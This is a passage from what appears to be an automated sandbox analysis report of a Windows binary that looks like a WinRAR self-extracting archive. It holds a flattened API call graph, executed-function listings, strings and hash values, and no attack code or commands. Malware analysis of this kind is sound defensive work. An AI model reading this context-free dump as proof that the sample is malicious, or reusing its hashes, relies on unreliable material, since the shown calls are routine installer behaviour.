f26310 26 API calls 25191->25192 25192->25194 25194->25162 25195 f11da7 WideCharToMultiByte 25195->25197 25197->25180 25197->25194 25197->25195 25235 f0e5b1 50 API calls __vsnprintf 25197->25235 25236 f26159 26 API calls 3 library calls 25197->25236 25237 f28cce 26 API calls ___std_exception_copy 25197->25237 25238 f27625 26 API calls ___std_exception_copy 25197->25238 25239 f0e27c 78 API calls 25197->25239 25201 f0da55 25200->25201 25201->25106 25203 f098ea 25202->25203 25204 f0994b CreateFileW 25203->25204 25205 f0996c GetLastError 25204->25205 25209 f099bb 25204->25209 25206 f0bb03 GetCurrentDirectoryW 25205->25206 25207 f0998c 25206->25207 25208 f09990 CreateFileW GetLastError 25207->25208 25207->25209 25208->25209 25211 f099b5 25208->25211 25210 f099ff 25209->25210 25212 f099e5 SetFileTime 25209->25212 25210->25167 25211->25209 25212->25210 25214 f26349 25213->25214 25215 f2634d 25214->25215 25226 f26375 25214->25226 25243 f291a8 20 API calls _free 25215->25243 25217 f26352 25244 f29087 26 API calls ___std_exception_copy 25217->25244 25218 f26699 25220 f1fbbc _ValidateLocalCookies 5 API calls 25218->25220 25222 f266a6 25220->25222 25221 f2635d 25223 f1fbbc _ValidateLocalCookies 5 API calls 25221->25223 25222->25168 25224 f26369 25223->25224 25224->25168 25226->25218 25245 f26230 5 API calls _ValidateLocalCookies 25226->25245 25228 f09bdc 25227->25228 25230 f09be3 25227->25230 25228->25177 25230->25228 25231 f09785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25230->25231 25246 f06d1a 77 API calls 25230->25246 25231->25230 25232->25177 25233->25174 25234->25197 25235->25197 25236->25197 25237->25197 25238->25197 25239->25197 25240->25182 25241->25187 25242->25185 25243->25217 25244->25221 25245->25226 25246->25230 25248 f27ce1 _abort 25247->25248 25249 f27cfa 25248->25249 25250 f27ce8 25248->25250 25271 f2ac31 EnterCriticalSection 25249->25271 25283 f27e2f GetModuleHandleW 25250->25283 25253 f27ced 25253->25249 25284 f27e73 GetModuleHandleExW 25253->25284 25257 f27d01 25268 f27d9f 25257->25268 25270 f27d76 25257->25270 25292 f287e0 20 API calls _abort 25257->25292 25259 f27de8 25293 f32390 5 API calls _ValidateLocalCookies 25259->25293 25260 f27dbc 25275 f27dee 25260->25275 25261 f28a91 _abort 5 API calls 25267 f27d8e 25261->25267 25262 f28a91 _abort 5 API calls 25262->25268 25267->25262 25272 f27ddf 25268->25272 25270->25261 25270->25267 25271->25257 25294 f2ac81 LeaveCriticalSection 25272->25294 25274 f27db8 25274->25259 25274->25260 25295 f2b076 25275->25295 25278 f27e1c 25281 f27e73 _abort 8 API calls 25278->25281 25279 f27dfc GetPEB 25279->25278 25280 f27e0c GetCurrentProcess TerminateProcess 25279->25280 25280->25278 25282 f27e24 ExitProcess 25281->25282 25283->25253 25285 f27ec0 25284->25285 25286 f27e9d GetProcAddress 25284->25286 25288 f27ec6 FreeLibrary 25285->25288 25289 f27ecf 25285->25289 25287 f27eb2 25286->25287 25287->25285 25288->25289 25290 f1fbbc _ValidateLocalCookies 5 API calls 25289->25290 25291 f27cf9 25290->25291 25291->25249 25292->25270 25294->25274 25296 f2b09b 25295->25296 25300 f2b091 25295->25300 25297 f2ac98 _free 5 API calls 25296->25297 25297->25300 25298 f1fbbc _ValidateLocalCookies 5 API calls 25299 f27df8 25298->25299 25299->25278 25299->25279 25300->25298 25409 f11bbd GetCPInfo IsDBCSLeadByte 25332 f1dca1 DialogBoxParamW 25410 f1f3a0 27 API calls 25335 f2a4a0 71 API calls _free 25336 f308a0 IsProcessorFeaturePresent 25369 f1eda7 48 API calls _unexpected 25411 f06faa 111 API calls 3 library calls 25338 f2b49d 6 API calls _ValidateLocalCookies 25371 f19580 6 API calls 25393 f1c793 102 API calls 4 library calls 25340 f1c793 97 API calls 4 library calls 25373 f1b18d 78 API calls 25341 f1a070 10 API calls 25394 f1b270 99 API calls 25414 f01f72 128 API calls __EH_prolog 23442 f09a74 23445 f09a7e 23442->23445 23443 f09b9d SetFilePointer 23444 f09bb6 GetLastError 23443->23444 23447 f09ab1 23443->23447 23444->23447 23445->23443 23445->23447 23448 f09b79 23445->23448 23449 f0981a 23445->23449 23448->23443 23450 f09833 23449->23450 23453 f09e80 23450->23453 23454 f09e92 23453->23454 23459 f09ea5 23453->23459 23458 f09865 23454->23458 23462 f06d5b 77 API calls 23454->23462 23455 f09eb8 SetFilePointer 23457 f09ed4 GetLastError 23455->23457 23455->23458 23457->23458 23460 f09ede 23457->23460 23458->23448 23459->23455 23459->23458 23460->23458 23463 f06d5b 77 API calls 23460->23463 23462->23459 23463->23458 25343 f01075 84 API calls 23465 f09f7a 23466 f09f8f 23465->23466 23467 f09f88 23465->23467 23468 f09f9c GetStdHandle 23466->23468 23475 f09fab 23466->23475 23468->23475 23469 f0a003 WriteFile 23469->23475 23470 f09fd4 WriteFile 23471 f09fcf 23470->23471 23470->23475 23471->23470 23471->23475 23473 f0a095 23477 f06e98 77 API calls 23473->23477 23475->23467 23475->23469 23475->23470 23475->23471 23475->23473 23476 f06baa 78 API calls 23475->23476 23476->23475 23477->23467 25395 f28268 55 API calls _free 25345 f1c793 107 API calls 4 library calls 25415 f27f6e 52 API calls 2 library calls 24592 f2c051 31 API calls _ValidateLocalCookies 25346 f1e455 14 API calls ___delayLoadHelper2@8 24610 f1cd58 24611 f1ce22 24610->24611 24617 f1cd7b 24610->24617 24623 f1c793 _wcslen _wcsrchr 24611->24623 24638 f1d78f 24611->24638 24612 f1b314 ExpandEnvironmentStringsW 24612->24623 24614 f1d40a 24615 f11fbb CompareStringW 24615->24617 24617->24611 24617->24615 24618 f1ca67 SetWindowTextW 24618->24623 24621 f23e3e 22 API calls 24621->24623 24623->24612 24623->24614 24623->24618 24623->24621 24624 f1c855 SetFileAttributesW 24623->24624 24629 f1cc31 GetDlgItem SetWindowTextW SendMessageW 24623->24629 24632 f1cc71 SendMessageW 24623->24632 24637 f11fbb CompareStringW 24623->24637 24662 f1a64d GetCurrentDirectoryW 24623->24662 24664 f0a5d1 6 API calls 24623->24664 24665 f0a55a FindClose 24623->24665 24666 f1b48e 76 API calls 2 library calls 24623->24666 24625 f1c90f GetFileAttributesW 24624->24625 24636 f1c86f _abort _wcslen 24624->24636 24625->24623 24628 f1c921 DeleteFileW 24625->24628 24628->24623 24630 f1c932 24628->24630 24629->24623 24631 f04092 _swprintf 51 API calls 24630->24631 24633 f1c952 GetFileAttributesW 24631->24633 24632->24623 24633->24630 24634 f1c967 MoveFileW 24633->24634 24634->24623 24635 f1c97f MoveFileExW 24634->24635 24635->24623 24636->24623 24636->24625 24663 f0b991 51 API calls 2 library calls 24636->24663 24637->24623 24640 f1d799 _abort _wcslen 24638->24640 24639 f1d9e7 24639->24623 24640->24639 24641 f1d8a5 24640->24641 24642 f1d9c0 24640->24642 24667 f11fbb CompareStringW 24640->24667 24644 f0a231 3 API calls 24641->24644 24642->24639 24646 f1d9de ShowWindow 24642->24646 24645 f1d8ba 24644->24645 24647 f1d8d9 ShellExecuteExW 24645->24647 24668 f0b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24645->24668 24646->24639 24647->24639 24652 f1d8ec 24647->24652 24649 f1d8d1 24649->24647 24650 f1d925 24669 f1dc3b 6 API calls 24650->24669 24651 f1d97b CloseHandle 24653 f1d989 24651->24653 24654 f1d994 24651->24654 24652->24650 24652->24651 24656 f1d91b ShowWindow 24652->24656 24670 f11fbb CompareStringW 24653->24670 24654->24642 24656->24650 24658 f1d93d 24658->24651 24659 f1d950 GetExitCodeProcess 24658->24659 24659->24651 24660 f1d963 24659->24660 24660->24651 24662->24623 24663->24636 24664->24623 24665->24623 24666->24623 24667->24641 24668->24649 24669->24658 24670->24654 25347 f1a440 GdipCloneImage GdipAlloc 25397 f23a40 5 API calls _ValidateLocalCookies 25416 f31f40 CloseHandle 24686 f1e44b 24687 f1e3f4 24686->24687 24687->24686 24688 f1e85d ___delayLoadHelper2@8 14 API calls 24687->24688 24688->24687 25378 f1f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25418 f1ff30 LocalFree 24693 f2bb30 24694 f2bb42 24693->24694 24695 f2bb39 24693->24695 24697 f2ba27 24695->24697 24698 f297e5 _abort 38 API calls 24697->24698 24699 f2ba34 24698->24699 24717 f2bb4e 24699->24717 24701 f2ba3c 24726 f2b7bb 24701->24726 24704 f2ba53 24704->24694 24705 f28e06 __vsnwprintf_l 21 API calls 24706 f2ba64 24705->24706 24707 f2ba96 24706->24707 24733 f2bbf0 24706->24733 24710 f28dcc _free 20 API calls 24707->24710 24710->24704 24711 f2ba91 24743 f291a8 20 API calls _free 24711->24743 24713 f2bada 24713->24707 24744 f2b691 26 API calls 24713->24744 24714 f2baae 24714->24713 24715 f28dcc _free 20 API calls 24714->24715 24715->24713 24718 f2bb5a ___scrt_is_nonwritable_in_current_image 24717->24718 24719 f297e5 _abort 38 API calls 24718->24719 24724 f2bb64 24719->24724 24721 f2bbe8 _abort 24721->24701 24724->24721 24725 f28dcc _free 20 API calls 24724->24725 24745 f28d24 38 API calls _abort 24724->24745 24746 f2ac31 EnterCriticalSection 24724->24746 24747 f2bbdf LeaveCriticalSection _abort 24724->24747 24725->24724 24727 f24636 __cftof 38 API calls 24726->24727 24728 f2b7cd 24727->24728 24729 f2b7ee 24728->24729 24730 f2b7dc GetOEMCP 24728->24730 24731 f2b7f3 GetACP 24729->24731 24732 f2b805 24729->24732 24730->24732 24731->24732 24732->24704 24732->24705 24734 f2b7bb 40 API calls 24733->24734 24735 f2bc0f 24734->24735 24738 f2bc60 IsValidCodePage 24735->24738 24740 f2bc16 24735->24740 24742 f2bc85 _abort 24735->24742 24736 f1fbbc _ValidateLocalCookies 5 API calls 24737 f2ba89 24736->24737 24737->24711 24737->24714 24739 f2bc72 GetCPInfo 24738->24739 24738->24740 24739->24740 24739->24742 24740->24736 24748 f2b893 GetCPInfo 24742->24748 24743->24707 24744->24707 24746->24724 24747->24724 24753 f2b8cd 24748->24753 24757 f2b977 24748->24757 24750 f1fbbc _ValidateLocalCookies 5 API calls 24752 f2ba23 24750->24752 24752->24740 24758 f2c988 24753->24758 24756 f2ab78 __vsnwprintf_l 43 API calls 24756->24757 24757->24750 24759 f24636 __cftof 38 API calls 24758->24759 24760 f2c9a8 MultiByteToWideChar 24759->24760 24762 f2c9e6 24760->24762 24769 f2ca7e 24760->24769 24764 f28e06 __vsnwprintf_l 21 API calls 24762->24764 24768 f2ca07 _abort __vsnwprintf_l 24762->24768 24763 f1fbbc _ValidateLocalCookies 5 API calls 24765 f2b92e 24763->24765 24764->24768 24772 f2ab78 24765->24772 24766 f2ca78 24777 f2abc3 20 API calls _free 24766->24777 24768->24766 24770 f2ca4c MultiByteToWideChar 24768->24770 24769->24763 24770->24766 24771 f2ca68 GetStringTypeW 24770->24771 24771->24766 24773 f24636 __cftof 38 API calls 24772->24773 24774 f2ab8b 24773->24774 24778 f2a95b 24774->24778 24777->24769 24779 f2a976 __vsnwprintf_l 24778->24779 24780 f2a99c MultiByteToWideChar 24779->24780 24781 f2ab50 24780->24781 24782 f2a9c6 24780->24782 24783 f1fbbc _ValidateLocalCookies 5 API calls 24781->24783 24785 f28e06 __vsnwprintf_l 21 API calls 24782->24785 24789 f2a9e7 __vsnwprintf_l 24782->24789 24784 f2ab63 24783->24784 24784->24756 24785->24789 24786 f2aa30 MultiByteToWideChar 24787 f2aa9c 24786->24787 24788 f2aa49 24786->24788 24814 f2abc3 20 API calls _free 24787->24814 24805 f2af6c 24788->24805 24789->24786 24789->24787 24793 f2aa73 24793->24787 24796 f2af6c __vsnwprintf_l 11 API calls 24793->24796 24794 f2aaab 24795 f28e06 __vsnwprintf_l 21 API calls 24794->24795 24798 f2aacc __vsnwprintf_l 24794->24798 24795->24798 24796->24787 24797 f2ab41 24813 f2abc3 20 API calls _free 24797->24813 24798->24797 24799 f2af6c __vsnwprintf_l 11 API calls 24798->24799 24801 f2ab20 24799->24801 24801->24797 24802 f2ab2f WideCharToMultiByte 24801->24802 24802->24797 24803 f2ab6f 24802->24803 24815 f2abc3 20 API calls _free 24803->24815 24806 f2ac98 _free 5 API calls 24805->24806 24807 f2af93 24806->24807 24809 f2af9c 24807->24809 24816 f2aff4 10 API calls 3 library calls 24807->24816 24811 f1fbbc _ValidateLocalCookies 5 API calls 24809->24811 24810 f2afdc LCMapStringW 24810->24809 24812 f2aa60 24811->24812 24812->24787 24812->24793 24812->24794 24813->24787 24814->24781 24815->24787 24816->24810 25350 f2c030 GetProcessHeap 25398 f1c220 93 API calls _swprintf 25352 f2f421 21 API calls __vsnwprintf_l 25353 f01025 29 API calls 25379 f2b4ae 27 API calls _ValidateLocalCookies 25421 f01710 86 API calls 25380 f1ad10 73 API calls 25357 f1a400 GdipDisposeImage GdipFree 25399 f1d600 70 API calls 25358 f26000 QueryPerformanceFrequency QueryPerformanceCounter 25383 f22900 6 API calls 4 library calls 25400 f2f200 51 API calls 25423 f2a700 21 API calls

                                                                          Executed Functions

                                                                          Function 00F1DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00F10863: GetModuleHandleW.KERNEL32(kernel32), ref: 00F1087C
                                                                            • Part of subcall function 00F10863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F1088E
                                                                            • Part of subcall function 00F10863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F108BF
                                                                            • Part of subcall function 00F1A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00F1A655
                                                                            • Part of subcall function 00F1AC16: OleInitialize.OLE32(00000000), ref: 00F1AC2F
                                                                            • Part of subcall function 00F1AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00F1AC66
                                                                            • Part of subcall function 00F1AC16: SHGetMalloc.SHELL32(00F48438), ref: 00F1AC70
                                                                          • GetCommandLineW.KERNEL32 ref: 00F1DF5C
                                                                          • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00F1DF83
                                                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00F1DF94
                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00F1DFCE
                                                                            • Part of subcall function 00F1DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00F1DBF4
                                                                            • Part of subcall function 00F1DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00F1DC30
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00F1DFD7
                                                                          • GetModuleFileNameW.KERNEL32(00000000,00F5EC90,00000800), ref: 00F1DFF2
                                                                          • SetEnvironmentVariableW.KERNEL32(sfxname,00F5EC90), ref: 00F1DFFE
                                                                          • GetLocalTime.KERNEL32(?), ref: 00F1E009
                                                                          • _swprintf.LIBCMT ref: 00F1E048
                                                                          • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00F1E05A
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00F1E061
                                                                          • LoadIconW.USER32(00000000,00000064), ref: 00F1E078
                                                                          • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00F1E0C9
                                                                          • Sleep.KERNEL32(?), ref: 00F1E0F7
                                                                          • DeleteObject.GDI32 ref: 00F1E130
                                                                          • DeleteObject.GDI32(?), ref: 00F1E140
                                                                          • CloseHandle.KERNEL32 ref: 00F1E183
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                          • API String ID: 3049964643-3743209390
                                                                          • Opcode ID: 8592d2e288421d570939186105f6e053e45faad652de7f1886b84f4d93cfb62b
                                                                          • Instruction ID: d1613b7951928d3f270e7d8b923ddf746c2e2e84f9c6d711fad86eb3469a9caf
                                                                          • Opcode Fuzzy Hash: 8592d2e288421d570939186105f6e053e45faad652de7f1886b84f4d93cfb62b
                                                                          • Instruction Fuzzy Hash: 30610871904309BFD320EB74EC49FAB37ADAB45725F000429FD45921A1DBB8DA88F762
                                                                          Function 00F1A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 812 f1a6c2-f1a6df FindResourceW 813 f1a6e5-f1a6f6 SizeofResource 812->813 814 f1a7db 812->814 813->814 815 f1a6fc-f1a70b LoadResource 813->815 816 f1a7dd-f1a7e1 814->816 815->814 817 f1a711-f1a71c LockResource 815->817 817->814 818 f1a722-f1a737 GlobalAlloc 817->818 819 f1a7d3-f1a7d9 818->819 820 f1a73d-f1a746 GlobalLock 818->820 819->816 821 f1a7cc-f1a7cd GlobalFree 820->821 822 f1a74c-f1a76a call f20320 CreateStreamOnHGlobal 820->822 821->819 825 f1a7c5-f1a7c6 GlobalUnlock 822->825 826 f1a76c-f1a78e call f1a626 822->826 825->821 826->825 831 f1a790-f1a798 826->831 832 f1a7b3-f1a7c1 831->832 833 f1a79a-f1a7ae GdipCreateHBITMAPFromBitmap 831->833 832->825 833->832 834 f1a7b0 833->834 834->832
                                                                          APIs
                                                                          • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00F1B73D,00000066), ref: 00F1A6D5
                                                                          • SizeofResource.KERNEL32(00000000,?,?,?,00F1B73D,00000066), ref: 00F1A6EC
                                                                          • LoadResource.KERNEL32(00000000,?,?,?,00F1B73D,00000066), ref: 00F1A703
                                                                          • LockResource.KERNEL32(00000000,?,?,?,00F1B73D,00000066), ref: 00F1A712
                                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00F1B73D,00000066), ref: 00F1A72D
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00F1A73E
                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00F1A762
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00F1A7C6
                                                                            • Part of subcall function 00F1A626: GdipAlloc.GDIPLUS(00000010), ref: 00F1A62C
                                                                          • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00F1A7A7
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00F1A7CD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                          • String ID: PNG
                                                                          • API String ID: 211097158-364855578
                                                                          • Opcode ID: f3fded4b44814e6777a35a08240033cfeaa1761b9754eb8cddfe4f0a80fe5815
                                                                          • Instruction ID: abdc9b9155ffe58653088bd7c807cfaaf076583b511b8b06e2cc6e1fd1da18b1
                                                                          • Opcode Fuzzy Hash: f3fded4b44814e6777a35a08240033cfeaa1761b9754eb8cddfe4f0a80fe5815
                                                                          • Instruction Fuzzy Hash: AA318F75A0130AAFD7109F21EC88D6B7BB9FF85771B040619F815C2261EB31DE84BAA1
                                                                          Function 00F0A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1029 f0a69b-f0a6bf call f1ec50 1032 f0a6c1-f0a6ce FindFirstFileW 1029->1032 1033 f0a727-f0a730 FindNextFileW 1029->1033 1034 f0a742-f0a7ff call f10602 call f0c310 call f115da * 3 1032->1034 1036 f0a6d0-f0a6e2 call f0bb03 1032->1036 1033->1034 1035 f0a732-f0a740 GetLastError 1033->1035 1042 f0a804-f0a811 1034->1042 1037 f0a719-f0a722 1035->1037 1044 f0a6e4-f0a6fc FindFirstFileW 1036->1044 1045 f0a6fe-f0a707 GetLastError 1036->1045 1037->1042 1044->1034 1044->1045 1047 f0a717 1045->1047 1048 f0a709-f0a70c 1045->1048 1047->1037 1048->1047 1050 f0a70e-f0a711 1048->1050 1050->1047 1052 f0a713-f0a715 1050->1052 1052->1037
                                                                          APIs
                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00F0A592,000000FF,?,?), ref: 00F0A6C4
                                                                            • Part of subcall function 00F0BB03: _wcslen.LIBCMT ref: 00F0BB27
                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00F0A592,000000FF,?,?), ref: 00F0A6F2
                                                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00F0A592,000000FF,?,?), ref: 00F0A6FE
                                                                          • FindNextFileW.KERNEL32(?,?,?,?,?,?,00F0A592,000000FF,?,?), ref: 00F0A728
                                                                          • GetLastError.KERNEL32(?,?,?,?,00F0A592,000000FF,?,?), ref: 00F0A734
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                          • String ID:
                                                                          • API String ID: 42610566-0
                                                                          • Opcode ID: 39736099921e1e735e50b50e3959516c0501f02150539882f95e127b782b3727
                                                                          • Instruction ID: b7d34a5a8e574c6234151602d8af81b2322c70ef53ea9a51175792bab20623e5
                                                                          • Opcode Fuzzy Hash: 39736099921e1e735e50b50e3959516c0501f02150539882f95e127b782b3727
                                                                          • Instruction Fuzzy Hash: D3416172900619ABCB29DF68CC84AE9B7B9FB48360F144196F95DE3240D7346ED4EF90
                                                                          Function 00F27DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000000,?,00F27DC4,00000000,00F3C300,0000000C,00F27F1B,00000000,00000002,00000000), ref: 00F27E0F
                                                                          • TerminateProcess.KERNEL32(00000000,?,00F27DC4,00000000,00F3C300,0000000C,00F27F1B,00000000,00000002,00000000), ref: 00F27E16
                                                                          • ExitProcess.KERNEL32 ref: 00F27E28
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentExitTerminate
                                                                          • String ID:
                                                                          • API String ID: 1703294689-0
                                                                          • Opcode ID: 2727199607fa852163003c0b21e51dfc890155106ab98d34777872f301893d2a
                                                                          • Instruction ID: 0feab06cc88a153c8a685ae5843b80207133d4b9aa576a4cea1606d79878a340
                                                                          • Opcode Fuzzy Hash: 2727199607fa852163003c0b21e51dfc890155106ab98d34777872f301893d2a
                                                                          • Instruction Fuzzy Hash: 8FE04F31400658EBCF01BF50ED099493F6AEB00361B014454F8058A132CB35DE51FA90
                                                                          Function 00F0848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: f43d68e9dd4ac5c18b38eac0f9adb40cf2c5ba6475994696d7237d2a22d44daf
                                                                          • Instruction ID: 7e2d63059b76e88b6daf6f92d0e3a2bbec1750cd42b4112dacc2afadd24ad6c9
                                                                          • Opcode Fuzzy Hash: f43d68e9dd4ac5c18b38eac0f9adb40cf2c5ba6475994696d7237d2a22d44daf
                                                                          • Instruction Fuzzy Hash: 64822A70D04245AEDF15DB64CC81BFABBB9AF05350F0841B9D8899B2C3DB745A89FB60
                                                                          Function 00F1B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F1B7E5
                                                                            • Part of subcall function 00F01316: GetDlgItem.USER32(00000000,00003021), ref: 00F0135A
                                                                            • Part of subcall function 00F01316: SetWindowTextW.USER32(00000000,00F335F4), ref: 00F01370
                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F1B8D1
                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1B8EF
                                                                          • IsDialogMessageW.USER32(?,?), ref: 00F1B902
                                                                          • TranslateMessage.USER32(?), ref: 00F1B910
                                                                          • DispatchMessageW.USER32(?), ref: 00F1B91A
                                                                          • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00F1B93D
                                                                          • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00F1B960
                                                                          • GetDlgItem.USER32(?,00000068), ref: 00F1B983
                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F1B99E
                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,00F335F4), ref: 00F1B9B1
